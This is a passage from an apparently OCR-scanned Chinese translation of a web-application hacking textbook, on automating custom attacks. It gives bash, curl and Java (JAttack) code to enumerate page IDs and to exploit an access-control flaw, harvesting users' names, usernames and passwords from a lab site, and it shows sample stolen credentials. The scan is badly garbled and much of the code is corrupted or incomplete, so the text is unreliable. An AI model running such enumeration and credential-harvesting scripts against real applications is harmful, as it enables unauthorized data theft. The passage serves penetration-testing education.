的 一 个 关键 问题 如何 使 用 自动 控制 加 强 并 促进 定制 攻击 。 我 们 所 
讨论 的 技巧 可 用 于 整个 应 用 程序 以 及 攻击 过 程 的 每 一 个 阶段 ， 包 括 最 
初 的 解析 过 程 到 实际 的 应 用 。 

每 一 个 Web 应 用 程序 都 各 不 相同 。 渗 透 测 试 员 需 要 使 用 各 种 手动 
操作 与 技巧 向 应 用 程序 实施 有 效 攻 击 ， 以 理解 它 的 行为 ， 并 探查 其 中 
存在 的 漏洞 。 同 时 还 必须 发 挥 想 象 ， 利 用 自己 的 经 验 与 直觉 。 通 常 ， 
测试 员 应 当 根据 已 经 确定 的 特殊 行为 ， 以 及 应 用 程序 允许 与 其 交互 并 
对 其 进行 控制 的 特定 情形 ， 实 施 本 质 上 定制 或 自 定义 的 攻击 。 手 动 实 
施 定制 可 能 极其 费力 ， 而 且 容易 出 错 。 为 此 ， 最 成 功 的 Web 应 用 程序 
黑客 往往 会 努力 简化 他 们 的 定制 攻击 ， 设 法 将 其 自动 化 ， 使 其 更 简 
单 、 快 捷 、 高 效 。 

本 章 将 讨论 一 种 实现 定制 攻击 自动 控制 的 公认 方法 。 这 种 方法 结 
合 了 人 类 智慧 及 计算 机 蛮 力 的 优点 ， 常 常会 造成 破坏 性 的 后 果 。 本 章 
水 将 介绍 使 用 自动 化 技巧 时 遂 到 的 各 种 障碍 ， 以 及 各 开 这 些 区 到 的 放 
o 


14.1 Ñ 动 化 


在 以 下 3 种 情况 下 ， 定 制 目 动 化 攻击 技巧 有 助 于 活 透 测试 员 癌 Web 
应 用 程序 实施 攻击 。 
口 枚 举 标 识 符 。 大 多 数 应 用 程序 使 用 各 种 名 称 与 标识 符 指 代数 据 
和 资产， 如 账号 、 用 户 名 和 文档 ID。 测 试 员 需 要 经 常 浏览 数目 庞大 的 
潜在 标识 符 ， 才 能 枚 举 出 那些 有 效 或 值得 进一步 研究 的 标识 待 。 在 这 
种 情况 下 ， 可 以 使 用 完全 定制 的 自动 技巧 来 分 析 一 组 可 能 的 标识 符 ， 
或 者 所 历 应 用 程序 所 使 用 的 标识 符 的 语法 苑 围 。 
0 0 
示例 : 


http: //mdsec.net/app/ShowPage.ashx?PageNo=10069 


在 浏览 应 用 程序 的 过 程 中 ， 会 发 现 大 量 有 效 的 PageNo 
值 ; 但 是 ， 要 确定 每 一 个 有 效 值 ， 必 须 循环 碍 找 整个 语法 苑 
围 ， 而 手动 操作 根本 无 法 做 到 这 一 点 。 

口 获取 数据 。 通 过 提出 专门 设计 的 特殊 请 求 ， 利 用 各 种 Web 应 用 
程序 漏洞 ， 测 试 员 吏 可 以 从 应 用 程序 中 提取 到 有 用 的 或 敏感 的 数据 。 
例如 ， 个 人 资料 页 面 可 能 会 显示 当前 用 户 的 个 人 与 银行 交易 信息 ， 并 
指出 该 用 户 在 应 用 程序 中 的 权限 。 通 过 一 个 访问 控制 漏洞 ， 束 可 以 碍 
看 任何 用 户 的 个 人 资料 页 面 ， 但 一 次 只 能 获得 一 名 用 户 的 资料 。 要 获 
得 所 有 用 户 的 资料 ， 可 能 需要 提交 成 干 上 万 个 请 求 。 这 时 ， 束 可 以 使 
用 一 个 目 动 化 定制 攻击 截获 所 有 数据 ， 而 不 是 进行 手动 操作 。 

获取 有 用 数据 的 一 个 示例 是 对 前 面 描 述 过 的 枚 举 攻 击 的 
扩展 。 这 时 不 必 确 认 到 底 哪些 PageNo 值 为 有 效 值 ， 相反 ， 可 
以 利用 目 动 化 攻击 来 从 获得 的 每 个 页 面 中 提取 出 HTML 标题 
0 
ae 


D web 应 用 程序 模糊 测试 。 当 描述 探查 常见 Web 应 用 程序 漏洞 
时 ， 能 够 见 到 大 量 的 示例 ， 在 这 些 示 例 中 ， 探 查 调 洞 的 最 佳 方法 是 提 
区 各 种 反常 的 数据 和 攻击 字符 串 ， 然 后 检查 应 用 程序 的 啊 应 ， 碍 找 任 
何 表 示 可 能 存在 漏洞 的 异 肖 现象 。 在 大 型 应 用 程序 中 ， 在 进行 初步 解 
析 过 程 中 ， 已 经 确定 一 些 需要 探查 的 特殊 请 求 ， 每 个 请 求 都 包 侣 各 种 
不 同 的 参数 。 手 动 检查 每 一 个 参数 既 费 时 又 费力 ， 而 且 可 能 会 忽略 大 


部 分 受 攻击 面 。 但 是 ， 使 用 定制 目 动 攻击 技巧 ， 束 可 以 立即 生成 大 量 
包含 常用 攻击 字符 串 的 请 求 ， 迅 速 访问 服务 器 的 响应 ， 找 到 所 有 值得 
进一步 研究 的 参数 。 这 种 技巧 常 被 称 为 模糊 测试 (fuzzing) 。 

我 们 将 详细 讨论 这 三 种 情形 ， 并 说 明 如 何 利用 定制 自动 攻击 技巧 


14.2 : 标识 


在 描述 各 种 利 见 漏洞 与 攻击 技巧 的 过 程 中 ， 我 们 提 到 ， 应 用 程序 
经 常 使 用 名 称 或 标识 符 指 代 各 种 数据 ， 渗 透 测试 员 的 任务 是 查 明 它 使 
用 的 部 分 或 全 部 有 效 的 标识 街 。 以 下 是 一 些 需要 枚 举 出 标识 符 的 情 


况 。 

口 应 用 程序 的 登录 功能 返回 详尽 的 错误 消息 ， 指 出 登录 失败 是 因 
为 用 户 名 不 存在 或 密码 错误 。 在 这 种 情况 下 ， 可 以 遍历 一 组 常见 的 用 
户 名 ， 并 党 试用 每 一 个 用 户 名 登录 ， 从 而 将 攻击 范围 缩小 至 那些 已 知 
a 0 
a lL 6 

口 许 多 应 用 程序 使 用 标识 符 指 代 应 用 程序 处 理 的 各 种 资源 ， 如 文 
档 ID、 账 号 、 雇 员 号 码 和 日 志 记 录 。 通 常 ， 应 用 程序 会 泄露 一 些 确 定 
特殊 标识 符 是 否 有 效 的 方法 。 因 此 ， 遍 历 应 用 程序 使 用 的 标识 符 的 语 
法 范围 惑 可 以 获得 所 有 这 些 资源 。 

口 如 采 应 用 程序 生成 的 会 话 令 牌 可 以 预测 ， 那 么 ， 以 应 用 程序 发 
布 的 一 些 令 牌 为 基础 进行 推 新 ， 束 可 以 支持 其 他 用 户 的 令 牌 。 根 据 这 


14.2.1 ”基本 步骤 


设计 一 个 枚 举 有 效 标 识 符 的 定制 目 动 攻击 的 第 一 步 是 查找 一 个 具 
有 以 下 特点 的 请 求 /响应 对 。 

口 请 求 的 参数 中 包含 所 针对 的 标识 符 。 例 如 ， 在 一 个 显示 应 用 程 
序 页 面 的 功能 中 ， 请 求 中 可 能 包含 参数 PageNo=10069 。 

口 当 改 变 这 个 参数 的 值 时 ， 服 务 右 对 这 个 请 求 的 啊 应 也 会 发 生 相 
应 变化 。 例 如 ， 如 果 请 求 一 个 有 效 的 PageNo， 服 务 器 可 能 返回 一 个 包 
含 指定 文档 内 容 的 啊 应 。 如 末 请 求 一 个 无 效 的 值 ， 它 可 能 会 返回 一 个 
常见 的 错误 消息 。 

确定 一 个 适当 的 请 求 / 啊 应 对 后 ， 接 下 来 应 向 应 用 程序 提交 大 量 目 
动 请 求 ， 循 环 浏览 所 有 湾 在 的 标识 符 ， 或 者 遇 历 已 知 应 用 程序 使 用 的 
标识 符 的 语法 范围 。 然 后 ， 监 控 应 用 程序 对 这 些 请 求 的 啊 应 ， 查 找 表 
示 提 交 有 效 标 识 符 的 “ 触 点 ”。 


14.2.2 ”探测 “ 触 点 ” 


改变 请 求 中 的 参数 值 后， 响应 的 许多 特征 会 发 生 系统 性 的 改变 ， 
它们 是 实施 目 动 攻击 的 基础 。 

1. HTTP 状 态 码 

根据 请 求 提 交 的 参数 值 ， 许 多 应 用 程序 系统 性 地 返回 各 种 不 同 的 
状态 码 。 在 枚 举 标识 符 的 攻击 中 ， 最 常见 的 状态 码 包 括 以 下 几 种 。 
口 200， 默 认 状 态 码 ， 表 示 请 求 成 功 提交 。 
口 301 或 302， 重 定 回 到 另外 一 个 URL 。 
口 401 或 403， 请 求 未 获 授权 或 被 禁止 。 
口 404， 被 请 求 的 资源 未 发 现 。 
口 500， 服 务 器 在 处 理 请 求 时 遇 到 错误 。 
2. 响应 长 度 
应 用 程序 中 的 动态 页 面 常 常 使 用 一 个 页 面 模板 建立 响应 (其 长 度 
RE) ， 并 在 这 个 模板 中 插入 针对 每 个 啊 应 的 内 容 。 如 果 针 对 每 个 啊 
应 的 内 容 不 存在 或 无 效 (例如 ， 请 求 了 一 个 错误 的 文档 ID) ， 那 么 应 
用 程序 就 会 返回 一 个 空白 响应 。 这 时 ， 响 应 长 度 就 是 证 明文 档 ID 是 否 
有 效 的 一 个 可 靠 指 标 。 

在 其 他 情况 下 ， 啊 应 长 度 不 同 可 能 表示 发 生 错误 或 存在 其 他 功 
能 。 根 据 我 们 的 经 验 ， 在 绝 大 多 数 情况 下 ，HTTP 响 应 码 与 响应 长 度 就 
足以 确定 反常 的 啊 应 。 

3. 响应 主体 

应 用 程序 返回 的 数据 中 常常 包含 可 用 于 探测 “ 触 点 ”的 字面 量 字 符 
串 或 模式 。 例 如 ， 如 果 请 求 一 个 无 效 的 文档 ID， 响 应 中 可 能 包含 字符 
$ Invalid document ID。 有 时， 即使 HTTP 啊 应 码 没 有 变化 ， 但 由 于 啊 
应 中 包含 动态 内 容 ， 总 体 啊 应 长 度 会 发 生 改 变 。 因 此 ， 在 响应 中 搜索 
一 个 特殊 的 字符 串 或 模式 可 能 是 确定 “ 触 点 ”的 最 佳 方法 。 

4. Location 消 息 头 

有 了 时候， 应 用 程序 会 以 一 个 HTTP 重 定向 (状态 码 为 301 或 302) ma 
应 访问 某 个 特殊 URL 的 请 求 ， 重 定 癌 的 目标 则 取决 于 在 请 求 中 提交 的 
参数 。 例 如 ， 如 果 提 区 正确 的 报告 名 称 ， 一 个 查看 报告 的 请 求 可 能 会 
导致 一 个 目标 为 /download.jsp 的 重 定 癌 ; 否则 ， 重 定 同 就 指 
回 /errorjsp。HTTP 重 定向 的 目标 在 Location 消 息 头 中 指定 ， 这 种 方法 
同样 也 可 用 于 确定 “ 触 点 ”。 

5 .Set-Cookie 消 息 头 


有 时 候 ， 应 用 程序 可 能 会 以 同样 的 方式 响应 一 组 请 求 ， 唯 一 例外 
的 是 有 些 时 候 它 会 设 定 一 个 cookie。 例如， 每 个 请 求 都 会 遇 到 相同 的 
重 定 向 ， 但 如 有 果 证 书 有 效 ， 应 用 程序 就 会 设 吓 一 个 包含 会 话 令 牌 的 
eee eee genet 
Sha o 

6. 时 间 延 迟 

少数 情况 下 ， 无 论 提交 的 参数 是 否 有 效 ， 服 务 器 响应 返回 的 实际 
内 容 可 能 完全 相同 ， 但 是 它 返 回 啊 应 的 时 间 可 能 稍 有 不 同 。 例 如 ， 如 
果 使 用 一 个 无 效 的 用 户 名 登录 ， 应 用 程序 可 能 会 立即 通过 一 个 并 不 包 
含 太 多 信息 的 常规 消息 做 出 响应 。 但 是 ， 如 果 提 交 的 是 有 效 的 用 户 
名 ,应 用 程序 整 需 要 进行 各 种 后 端 处 理 来 确认 用 户 提 交 的 证 书 ， 其 中 
一 些 处 理 可 能 要 进行 大 量 计算 ， 如 采 发 现 证 书 错误 ， 再 返回 相同 的 消 
妃 。 如 采 远 程 检测 到 这 种 时 间 差 异 ， 就 可 以 用 它 来 确定 攻击 中 的 " 触 
点 ”。 (其 他 类 型 的 软件 ， 如 旧版 的 OpenSSH 中 也 常常 发 现 这 种 漏 


iF] e ) 


Vo 提示 选择 “ 触 点 ”指标 的 主要 目的 是 找到 一 个 或 一 组 (如 果 
结合 在 一 起 ) 完全 可 靠 的 “* 触 点 "。 但 是 ， 在 一 些 攻 击 中 ， 提 前 并 不 


知道 什么 是 “和 触 点 ”。 例 如 ， 当 渗透 测试 员 针 对 登 孙 功能 实施 攻击 ， 
壬 试 枚 举 用 户 名 时 ， 并 没有 一 个 有 效 的 用 户 名 可 帮助 他 确定 应 用 程 
序 在 过 到 “ 触 点 ”时 的 行为 。 在 这 种 情况 下 ， 最 好 是 监控 应 用 程序 中 
刚刚 描述 的 各 种 特征 ， 导 找 其 中 出 现 的 任何 异常 现象 


14.2.3 ”编写 攻击 脚本 


假设 已 经 确定 以 下 URL， 如 果 提 交 一 个 有 效 的 PageNo 值 ， 它 将 返 
回 200 啊 应 码 ; 否则 它 就 返回 500 啊 应 码 : 


http: //mdsec.net/app/ShowPage.ashx?PageNo=10069 


这 个 请 求 / 啊 应 对 满足 实施 目 动 攻击 并 且 枚 举 有 效 页 面 ID 所 需要 的 
两 个 条 件 。 

在 这 样 简单 的 情况 下 ， 可 以 立即 创建 一 段 定 制 的 脚本 ， 实 施 一 次 
目 动 攻击 。 例 如 ， 下 面 的 bash 脚 本 从 stdin 读 取 一 组 潜在 的 页 面 ID， 使 


用 netcat 工 具 请 求 一 个 包含 每 个 ID 的 URL， 同 时 记录 服务 器 啊 应 的 第 一 
BE EIN 


ryver\r\n\r\n" 


Gone | coe odie > 
用 一 个 适当 的 输入 文件 (input file) 运行 这 段 脚本 ， 得 到 以 下 输 
出 ， 可 以 迅速 从 中 确定 有 效 的 页 面 ID: 


~> ./script <IDs.txt 

0060 HTTP/1.0 500 Internal Server Error 
0061 HTTP/1.0 500 Internal Server Error 
10062 HTTP/1.0 200 Ok 

10063 HTTP/1.0 200 Ok 

10064 HTTP/1.0 500 Internal Server Error 


YV 提示“Cygwin 环 境 可 用 于 在 Windows 平 台 上 运行 bash 脚 本 ; 


此 外 ，UnxUtils 套 件 中 包含 大 量 有 用 的 GNU 实 用 工具 的 Win32 端 
口 ， 如 head 和 grep。 


使 用 一 段 Windows 批 处 理 脚本 也 可 oes 到 相同 的 目的 。 下 面 的 示 
例 使 用 curl 工 具 生 成 请 求 ， 并 通过 findstr 命 令 过 滤 输 出 : 


.txt) do echo $i && curl 
i -s | findstr /B HTTP/1.0 


for /= “tokens=1" %1 in (ID 
mdsec.net/app/ShowPage.ashx? PageNo=%i 


虽然 这 这 些 简 单 的 脚本 非 芝 到 村 执行 一 些 不 太 复杂 的 任务 ， 如 循环 
浏览 一 组 参数 值 及 在 服务 需 啊 应 中 解析 某 个 属性 ， 但 是 ， 在 许多 情况 
下 ， 可 能 需要 使 用 比 命令 行 脚 本 更 强大 、 更 灵活 的 工具 。 我 们 首选 一 
ESEA 回 对 象 的 语言 ， 它 必须 便于 处 理 基 于 字符 串 的 数据 ， 


并 提供 文 持 套 接 字 和 SSL 的 API。 满 足 这 些 标准 的 语言 包括 Java、C# 和 
Python。 下 面 将 深入 分 析 一 个 使 用 Java 的 示例 。 


14.2.4 JAttack 


JAttack 是 一 个 简单 但 功能 强大 的 工具 ， 通 过 它 ， 任 何人 只 要 懂得 
一 些 编程 基础 知识 ， 束 可 以 使 用 定制 目 动 技巧 回应 用 程序 实施 强大 的 
攻击 。 这 个 工具 的 完整 源 代码 可 从 本 书 的 同步 网 站 

(http://mdsec.net/wahh) 下 载 。 但 是 ， 比 源 代码 更 重要 的 是 使 用 这 个 

工具 的 基本 技巧 ， 下 面 将 对 此 进行 简要 说 明 。 

不 要 把 请 求 仅 当 做 一 个 非 结构 化 的 文本 块 处理 ， 而 是 要 利用 该 工 
具 理 解 请 求 参数 的 概念 : 它 是 一 个 可 被 操控 ， 并 以 特殊 方式 附加 在 请 
求 上 的 命名 数据 。 请 求 参数 可 能 出 现在 URL 请 求 字 符 串 、HTTP cookie 
或 POST 请 求 主体 中 。 下 面 创建 一 个 Param 类 保存 相关 细 广 。 


/17 JAttack. java 

‘/ by Dafydd Stuttard 
import java.net.”*; 
import jJava.io.*; 


class Param 
String name, value; 
Type type; 
bool: an att ack; 
Param(String name, String value, Type type, boolean attack) 


this.name = name; 


this.value = value; 
this.type = type; 
this.attack = attack; 


} 


enum Type 
{ 
URL, COOKIE, BODY 


} 
} 


许多 时 候 ， 请 求 中 包含 不 希望 在 某 个 特定 的 攻击 中 修改 的 参数 ; 
但 为 了 成 功 实施 攻击 ， 仍 然 需要 包 侣 这 些 参数 。 可 以 使 用 attack 字 段 标 
记 某 个 参数 是 否 可 在 当前 攻击 中 进行 修改 。 
要 以 一 种 特定 的 方式 修改 某 个 参数 的 值 ，JAttack 工 具 必 须 理解 攻 
击 有 效 载 符 的 概念 。 在 不 同类 型 的 攻击 中 ， 需 要 创建 各 种 有 效 载 谷 源 
(payload source) 。 首 先 建立 一 个 所 有 有 效 载荷 必须 执行 的 界面 ， 所 
高 这 个 工具 的 灵活 性 : 


interface PayloadSource 


{ 
boolean nextPayload(); 
void reset(); 
String getPayload(); 

} 


nextPayload DEn AF ine A ERS, BREWS 
ea A Ea 73K [ltrue ° reset 77 Ei [EA EK aT VRE TRS e 
getPayload 77 VAX [I 5 BA OE far EL © 

在 枚 举 文档 的 示例 中 ， 想 要 修改 的 参数 包含 一 个 数字 值 ， 因 此 首 
允 在 PayloadSource 界 面 中 执行 一 个 类 ， 生 成 数字 有 效 载 何 。 可 通过 这 
个 类 指定 想 要 测试 的 数字 范围 : 


class PSNumbers implements PayloadSource 
{ 
int from, to, step, current; 
PSNumbers(int from, int to, int step) 
{ 
this.from = from; 
this.to = to; 
this.step = step; 
reset (); 


public boolean nextPayload({) 
{ 

current += step; 

return current <= to; 


public void reset() 
{ 


current = from - step; 


} 


public String getPayload(} 
{ 


return Integer.toString(current); 
} 


了 解 请 求 参 数 与 有 效 载 符 源 的 概念 后 ， 我 们 已 经 拥有 足够 的 资 
产 ， 能 够 生成 请 求 并 处 理 服 务 器 的 啊 应 。 站 和 完 ， 对 攻击 进行 一 些 配 
H: 


class JAttack 
{ 
{// attack config 


String hest = "mdsec.net"; 

int port = 80; 

String methed = "GET"; 

String url = "/app/ShowPage.ashx"; 


Param[] params = new Param[] 


new Param("PageNo", "10069", Param.Type.URL, true}, 
}; 
PayloadSource payloads = new PSNumbers(10060, 10080, 1}; 


个 配置 包含 目标 的 基本 信息 ， 创 建 一 个 叫做 PageNo 的 请 求 参 
数 ， a 7E10060~ 10080 ABNF A RE aT VRAIS Eo 
为 了 循环 浏览 一 系列 的 请 求 并 针对 多 个 参数 ， 需 要 保持 某 种 状 
。 使 用 一 个 简单 的 nextRequest 方 法 监控 请 求 引 警 的 状态 ， 它 在 浏览 
完 所 有 请 求 后 返回 true 值 。 


// attack state 
int currentParam = Q0; 


boolean nextRequest () 


{ 


} 


if (currentParam >= params. length) 
return false; 


if (!params[currentParam] .attack) 
{ 


currentParam++; 
return nextRequest(); 


if ({!payloads.nextPayload(}) 
payloads.reset(); 


currentParam++; 
return nextRequest(); 


return true; 


这 个 有 状态 的 请 求 引擎 将 追踪 当 前 正 针 对 哪个 参数 ， 以 及 在 其 中 
插入 了 什么 攻击 有 效 载 何 。 搂 下 来 使 用 这 些 信息 建立 一 个 完整 的 HTTP 


Ai 


请 求 。 它 包括 在 请 求 中 插入 每 种 类 型 的 参数 ， 并 增加 任何 必要 的 消 奶 


String buiidRequest{} 

{ 
f} build parameters 
StringBuffer urlParams -= new SCcringBuzierf): 
StringBuffer cookieParams = new StringBuffer(); 


StringBuffer bodyParams = new StringBuffer ({); 


for {int i = 0; i < params.length; i++} 
{ 
String value = (i == currentParam) ? 


payloads.getPayload{) 
params [i] .value; 

if ({params[i!.type == Param.Type.URL) 
urlParams.append(params[i]).name + "=" + value + "&"}; 


else if iparaems [li] .type == Param.Type.COOKTS) 


cookieParams.append(paramsfi].name + "=" + value + “; "); 
else if {params[i].type == Param.Type. BODY) 
bodyParems.append{parems[i]).name + "=" + value + "&"); 
// build request 
StringBuffer req = new StringRuffer(); 
req.append(method > * * + url); 
if (urlParams.iength{) > 0) 
reqd.append{"?" + urlParams.substring({(, urlParams.length{) 1}); 


req.append(* HTTP/1.O\r\nHost: ”+ host); 
if (cookieParams.iength() > 0} 

reg.append{*\r\nCookie: * + cookieParams.toString(}); 
if (bocyParams.length{) > 0) 


一 


reg.append(*\r\nContent-Type: application/x-wew-form-urlencoded"}; 
rec.append({*\r\nContent-Length: ”+ (bodyParams.length{} - 1)}; 
rea.append(*\r\n\r\n"); 

rec.append (bedyParams.substring(9, bodyParams.lengtn{) = 1)); 


else reg.append{*"\r\n\rin"); 


T 注解 URE CWSBEMPOSTIAR, HA, MERIT 
的 代码 中 一 样 ， 就 需要 在 其 中 包含 一 个 有 效 的 Content-Length 消 息 


头 ， 指 定 每 个 请 求 中 HTTP 主 体 的 实际 长 度 。 如 果 提 区 的 是 无 效 的 
Content-Length， 大 多 数 Web 服 务 絮 或 者 将 提交 的 数据 截 短 ， 或 者 等 
答 再 提交 更 多 的 数据 。 


要 送出 请 求 ， 需 要 与 目标 Web 服 务 器 建立 网 络 连接 o 使 用 Java 之 
后 ， 建 并 TCP 连 授 、 提 交 数 据 并 读 取 服务 器 啊 应 的 任务 都 变 得 极其 简 


(0) 


JÆ 


String issueRequest (String req) throws UnknownHostBxception, 
= new Socket (host, port); 


OutputStream os = socket.getOutputstream() ; 


Socxet socxet 


os.write(req.getBytes(}); 
os.flush(); 


BufferedReader br = new BufferedReader {new InputStreamReader | 


socket .getinputsStream()})); 


StringBuffer response = new StringBulfer(); 

String line; 

while (null != (line = br.readLine{))) 
respon ppend( lin 


获得 服务 器 对 每 个 请 求 所 做 出 的 啊 应 后 ， 需 要 解析 这 些 啊 应 ， 提 
取出 相关 信息 ， 确 定 攻 击 中 的 “ 触 点 ?”。 甫 先 记录 两 个 有 用 的 数据 一 一 


啊 应 第 一 行 的 HTTP 状 态 码 与 啊 应 的 总 长 度 : 


String parseResponse (String response} 


{ 


StringBuffer output = new StringBuffer (); 


output.append(response.split({("\\s+", 3) 11] + “\t"); 
mngth{)) + "\t 


output.append(Integer.toString (response. ler 


return output.toString(); 


MECENATE > aa A i Be EE le a Se it 
调用 前 面 提 到 的 每 一 个 方法 并 指出 其 结果 ， 直 到 提出 所 有 请 求 ， 


nextRequest 方 法 返回 false: 


void doAttack({) 

{ 
System.out.printin("param\tpayloac\tstatus\tlength") ; 
String output = null; 


while (nextRequest()) 


try 
{ 


output = parseResponse(issueRequest (buildRecuest(})); 


catch (Exception e} 


{ 


output = e.toString(); 
} 
System.out.println{params |currentParam) .name + "\t" + 
payloads.getPayload() + "\t" + output}; 


} 


public static void main(String[] args) 


{ 
new JAttack(}.doArtack{); 


} 


整个 过 程 就 是 这 样 ! 为 编写 并 运行 这 些 代码 ， 需 要 下 载 Sun 公 司 
的 Java SDK 与 JRE， 然 后 运行 下 面 的 脚本 : 


> javac JAttack.java 
> java JAttack 


根据 我 们 在 示例 中 的 配置 ， 这 个 工具 输出 如 下 结 采 : 


param payload status length 
PageNo 10060 500 3154 
PageNo 10061 500 3154 
PageNo 10062 200 1083 
PageNo 10063 200 1080 


PageNo 10064 500 3154 


如 有 果 网 络 连接 与 处 理 能 力 一 切 正常 ，JAttack 每 分 钟 能 够 提出 数 百 
个 请 求 ， 并 输入 相关 细 下 ， 帮 助 迅速 确定 需要 进一步 研究 的 有 效 文档 
标识 符 。 


尝试 访问 


http://mdsec.net/app/ 


看 起 来 ， 似 乎 刚刚 描述 的 攻击 并 不 比 前 面 只 需要 儿 行 代 码 的 bash 
脚本 实例 更 复杂 。 但 是 ，JAttack 的 设计 形式 允许 对 它 进 行 任意 修改 ， 
从 而 实施 更 加 强大 的 攻击 ， 合 并 多 个 请 求 参数 、 各 种 有 效 载 何 兰 ， 并 
对 啊 应 进行 任何 复杂 的 处 理 。 下 面 几 市 将 对 JAttack 的 代码 进行 一 些 修 
改 ， 使 其 实现 更 强大 的 功能 。 


14.3 X 


当 攻 击 应 用 程序 时 ， 和 定制 自动 化 技巧 的 第 二 个 主要 用 途 是 ， 通 过 
专门 设计 的 特殊 请 求 ， 以 一 次 一 个 数据 的 速度 获取 信息 ， 从 而 提取 出 
有 用 的 或 敏感 的 数据 。 如 果 已 经 确定 一 个 可 供 利 用 的 漏洞 (如 访问 控 
制 缺 陷 ) ， 并 能 够 通过 为 一 个 未 授权 的 资源 指定 标识 符 的 方式 来 访问 
这 个 资源 ， 那 此 时 往往 就 会 出 现 这 种 情况 。 但 是 ， 即 使 应 用 程序 完全 
按 设 计 者 预计 的 方式 运行 ， 也 可 能 会 出 现 这 种 情况 。 在 下 面 这 些 情况 
下 ， 渗 透 测试 员 可 以 使 用 目 动 化 技巧 获取 数据 。 

口 一 个 网 上 零售 应 用 程序 允许 注册 用 户 碍 看 他 们 的 竺 办 订单 。 但 
是 ， 如 果 能 够 确定 其 他 用 户 的 订单 号 ， 就 可 以 查看 他 们 的 订单 信息 ， 
就 像 查看 自己 的 订单 一 样 。 

口 态 记 密码 功能 的 实施 取决 于 用 户 配置 的 质询 。 可 以 提交 任意 用 
户 名 并 查看 相关 质询 。 通 过 遍历 一 组 枚 举 或 猜测 出 来 的 用 户 名 ， 就 能 
够 获得 大 量 用 户 密码 质询 ， 从 而 确定 那些 最 容易 猜测 的 质询 。 

口 一 个 工作 流程 应 用 程序 包含 一 项 功能 ， 可 显示 某 一 用 户 的 基本 
账户 信息 ， 包 括 他 在 应 用 程序 中 的 权限 。 通 过 明 历 应 用 程序 使 用 的 用 
户 ID， 渗 透 测试 员 束 能 够 列 出 所 有 的 管理 用 户 ， 并 以 此 为 基础 进行 密 
码 猜测 和 其 他 攻击 。 

使 用 目 动 化 技巧 获取 数据 的 基本 步骤 与 枚 举 有 效 标 识 符 的 步骤 基 
本 类 似 ， 其 不 同 之 处 在 于 ， 现 在 不 仅 对 一 个 二 进 制 结果 〈“ 触 点 ?或 “ 错 
失 ”) 感 兴趣 ， 还 要 设法 从 每 个 响应 中 提取 有 用 的 内 容 。 以 下 面 的 请 求 
为 例 ， 它 由 登录 用 户 提出 ， 以 显示 其 账户 信息 。 

GET /auth/498/YourDetails.ashx?uid=198 HTTP/1.1 
Host: mdsec.net 
Cookie: SessionId=0947F6DC9A66D29F15362D031B337797 


虽然 只 有 通过 验证 的 用 户 能 够 访问 此 应 用 程序 功能 ， 但 由 于 存在 
访问 控制 漏洞 ， 任 何 用 户 只 需 简 单 修 改 uid 参 数 ， 即 可 查看 其 他 所 有 用 
户 的 详细 资料 。 在 另 一 个 漏洞 中 ， 披 露 的 详细 资料 还 包括 用 户 的 完整 
证 书 。 由 于 用 户 的 uid 参 数值 相对 较 小 ， 因 此 ， 攻 击 者 能 够 轻易 推测 出 
其 他 用 户 的 标识 符 。 

当 应 用 程序 显示 一 个 用 户 的 资料 时 ， 页 面 源 代码 会 将 个 人 信息 包 
含 在 下 面 的 HTML 表 中 : 


<tr> 
<td>Name: </td><td>Phill Bellend</td> 


</tr> 
<Er 

<td>Username: </td><td>phillb</td> 
Sf ECS 
<{Cr> 

<td>Password: </td><td>b3ll3nd</td> 
</tr> 


根据 应 用 程序 的 行为 ， 攻 击 者 可 直接 实施 定制 目 动 攻击 ， 获 取 所 
有 应 用 程序 用 户 的 个 人 信息 ， 包 括 证 书 等 。 

为 实施 攻击 测试 ， 我 们 快速 对 JAttack 工 具 进 行 一 些 改进 ， 使 它 能 
够 提取 并 记录 服务 右 啊 应 中 的 特殊 数据 。 前 先 ， 将 攻击 配置 数据 添加 
到 源 代码 的 字符 串 列表 内 ， 通 过 它们 确定 想 要 提取 的 有 用 内 容 : 


static final String[] extractStrings = new String[] 
{ 


“<td>Name: </td><td>", 
“<td>Username: </td><td>", 
“<td>Password: </td><td>" 
+3 
然后 把 下 面 的 代码 添加 到 parseResponse 方 法 中 ， 以 在 每 个 响应 中 


搜索 上 述 列 表 中 的 每 一 个 字符 串 ， 并 提取 字符 串 后 到 圆 括号 位 置 的 内 
容 : 


for (String extract : extractStrings) 


{ 
int from = response.indexOf (extract); 
1£ {from == -1) 
continue; 


from += extract.length(); 
int to = response.index0f("<", from}; 
if {to == =} 
to = response.length{); 
output.append(response.subSequence(from, to) + "\t"); 
} 


这 就 古 对 这 个 工具 的 代码 进 和 了 的 全 部 修改 。 为 配置 JAttack 针 对 我 
们 感 兴趣 的 实际 请 求 ， 需 要 对 它 的 攻击 配置 进行 如 下 更 新 : 


String url = "/auth/498/YourDetails.ashx"; 


Param[] params = new Faram[] 


{ 
new Param("Sessionid", "0947F6DC9A66D29F15362D031B337797", 
Param.Type.CCOKIE, faise), 
new Param("uid", "198", Param.Type.URL, true}, 
}; 


PayloadSource payloads = new PSNumbers (190, 200, 1); 


个 配置 指示 JAttack 向 相关 URL 提 出 包 o 
moa 话 令 牌 的 cookie 和 易 受 攻击 的 用 户 标 识 符 。 其 中 只 有 一 个 
参数 会 通过 我 们 指定 的 uid 号 范围 进行 修改 。 

现在 再 运行 JAttack， 得 到 以 下 结 


uid 190 500 300 

uid 191 200 27489 Adam Matthews sixpack p4alight 
uid 192 209 28991 Pablina S pablo puntitadth 
uid 193 200 29430 Shawn fattysh er3qqgslu7 
uid 194 5090 300 

vid 195 200 28224 Ruth House ruth_h lonelypu55 
uid 196 509 390 

uid 197 209 28171 Chardonnay vegasc Gangermeuse 
uid 198 209 27880 Phill Bellend phillb b31l3nd 
uid 199 200 28901 Paul Byrne byrnsey 133tfuzz 
uid 200 200 27388 Peter Weiner weiner skinthird 


可 见 ， 这 次 攻击 成 功 截取 了 一 些 顾 客 的 个 人 资料 。 通 过 扩 大 攻击 
的 数值 范围 ， 我 们 可 以 提取 应 用 程序 所 有 用 广 的 登录 信息 很 有 可 能 


尝试 访问 


http://mdsec.net/auth/498/ 
注意 ， 如 果 对 此 实验 室 示 例 运 行 JAttack 代 码 ， 则 需要 根据 应 用 
程序 发 布 的 值 调 整 攻击 配置 中 使 用 的 URL、 会 话 cookie 和 用 户 ID 参 


数 。 


YY ”提示 以 制 表 符 分 隔 格 式 输出 的 数据 可 轻易 加 载 到 Excel 之 
类 的 电子 表格 软件 中 ， 以 对 其 进行 进一步 处 理 或 整理 。 许 多 时 候 ， 
通过 以 上 方法 获取 的 数据 可 用 作 其 他 目 动 攻击 的 输入 。 


